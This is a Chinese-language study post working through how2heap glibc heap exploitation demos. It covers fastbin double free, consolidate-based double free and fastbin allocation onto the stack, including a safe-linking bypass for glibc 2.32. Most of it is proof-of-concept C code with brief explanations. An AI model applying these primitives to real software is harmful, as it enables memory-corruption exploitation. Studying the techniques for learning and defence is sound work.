how2heap笔记(1)

因为感觉堆学的很乱，所以决定按照how2heap再走一遍。

fastbin_dup

描述：Tricking malloc into returning an already-allocated heap pointer by abusing the fastbin freelist.

就是指malloc回来一个已经在使用的堆

glibc-2.23

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
    fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
    a = malloc(8);
    b = malloc(8);
    c = malloc(8);
    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    assert(a == c);
}

代码很简单，这就是一个doublefree的复现，开始调试。

首先malloc三个堆块

接下来释放掉第一个堆块

继续执行，如果这个时候我们再继续释放第一个堆块就会出现什么情况呢

会报doublefree的错误，而这个时候，我们执行的操作是先free第二个堆块，再free第一个堆块。

这样就会出现如下情况，我们再malloc三个堆，就可以得到两个a块。

glibc-2.27

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
    setbuf(stdout, NULL);

    printf("This file demonstrates a simple double-free attack with fastbins.\n");

    printf("Fill up tcache first.\n");
    void *ptrs[8];
    for (int i=0; i<8; i++) {
        ptrs[i] = malloc(8);
    }
    for (int i=0; i<7; i++) {
        free(ptrs[i]);
    }

    printf("Allocating 3 buffers.\n");
    int *a = calloc(1, 8);
    int *b = calloc(1, 8);
    int *c = calloc(1, 8);

    printf("1st calloc(1, 8): %p\n", a);
    printf("2nd calloc(1, 8): %p\n", b);
    printf("3rd calloc(1, 8): %p\n", c);

    printf("Freeing the first one...\n");
    free(a);

    printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    printf("So, instead, we'll free %p.\n", b);
    free(b);

    printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
    a = calloc(1, 8);
    b = calloc(1, 8);
    c = calloc(1, 8);
    printf("1st calloc(1, 8): %p\n", a);
    printf("2nd calloc(1, 8): %p\n", b);
    printf("3rd calloc(1, 8): %p\n", c);

    assert(a == c);
}

基本和2.23无区别，只是填充了tcache。

直到最新的libc也存在。

fastbin_dup_consolidate

一个利用consolidate机制的doublefree，本质上还是需要有uaf漏洞。

glibc-2.23

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

void main() {
    // reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
    puts("This is a powerful technique that bypasses the double free check in tcachebin.");
    printf("Fill up the tcache list to force the fastbin usage...\n");

    void* p1 = calloc(1,0x40);

    printf("Allocate another chunk of the same size p1=%p \n", p1);
    printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
    free(p1);

    void* p3 = malloc(0x400);
    printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
    printf("will trigger the malloc_consolidate and merge\n");
    printf("the fastbin chunks into the top chunk, thus\n");
    printf("p1 and p3 are now pointing to the same chunk !\n\n");

    assert(p1 == p3);

    printf("Triggering the double free vulnerability!\n\n");
    free(p1);

    void *p4 = malloc(0x400);

    assert(p4 == p3);

    printf("The double free added the chunk referenced by p1 \n");
    printf("to the tcache thus the next similar-size malloc will\n");
    printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);

2.23下就是说首先做一个fastbin范围内的malloc，然后将其free掉

紧接着malloc一个大于smallbin大小的堆，触发合并机制，fastbin里的堆直接合并进topchunk中。

可以看见，fastbins中原本存在的堆块已经不见了，接下来再malloc一个和大堆块一样大小的堆块就会出现两个指针指向两个同时在用的堆块的情况。

其他libc也是一样，直到最新的libc，只是再libc-2.27后加了tcache。

fastbin_dup_into_stack

这个就是需要能改fastbins中chunk的fd位，还需要栈中的一个位置有对应大小作为size位。

glibc-2.23

#include <stdio.h>
#include <stdlib.h>

int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
           "returning a pointer to a controlled location (in this case, the stack).\n");

    unsigned long long stack_var;

    fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
        "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    unsigned long long *d = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", d);
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
        "so that malloc will think there is a free chunk there and agree to\n"
        "return a pointer to it.\n", a);
    stack_var = 0x20;

    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}

和fastbin_dup很像的一个实验，前面就是doublefree，得到了有一个chunk，他同时再fastbins中和使用中的时候，向使用中的那个chunk写入栈上size位-8的地址，即可得到

再malloc一次就能将堆malloc到栈上。

glibc-2.32

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking calloc into\n"
           "returning a pointer to a controlled location (in this case, the stack).\n");


    fprintf(stderr,"Fill up tcache first.\n");

    void *ptrs[7];

    for (int i=0; i<7; i++) {
        ptrs[i] = malloc(8);
    }
    for (int i=0; i<7; i++) {
        free(ptrs[i]);
    }


    unsigned long stack_var[2] __attribute__ ((aligned (0x10)));

    fprintf(stderr, "The address we want calloc() to return is %p.\n", stack_var);

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = calloc(1,8);
    int *b = calloc(1,8);
    int *c = calloc(1,8);

    fprintf(stderr, "1st calloc(1,8): %p\n", a);
    fprintf(stderr, "2nd calloc(1,8): %p\n", b);
    fprintf(stderr, "3rd calloc(1,8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n"); //First call to free will add a reference to the fastbin
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    //Calling free(a) twice renders the program vulnerable to Double Free

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
        "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    unsigned long *d = calloc(1,8);

    fprintf(stderr, "1st calloc(1,8): %p\n", d);
    fprintf(stderr, "2nd calloc(1,8): %p\n", calloc(1,8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
        "so that calloc will think there is a free chunk there and agree to\n"
        "return a pointer to it.\n", a);
    stack_var[1] = 0x20;

    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n");
    fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n");
    unsigned long ptr = (unsigned long)stack_var;
    unsigned long addr = (unsigned long) d;
    /*VULNERABILITY*/
    *d = (addr >> 12) ^ ptr;
    /*VULNERABILITY*/

    fprintf(stderr, "3rd calloc(1,8): %p, putting the stack address on the free list\n", calloc(1,8));

    void *p = calloc(1,8);

    fprintf(stderr, "4th calloc(1,8): %p\n", p);
    assert((unsigned long)p == (unsigned long)stack_var + 0x10);
}

到了2.32就可以看出差别了，因为2.32引入了新的保护机制：safe-linking

p是fd指针，l是fd指针所在的地址。

所以出现不同的是在设置fd值的时候，将其向右移动12位再与fd的地址进行异或。但是本质方法还是一样的。

该漏洞还是适用到最新的libc版本，这个方法当然也可以用在不止是栈的地方，实现近乎任意地址写入。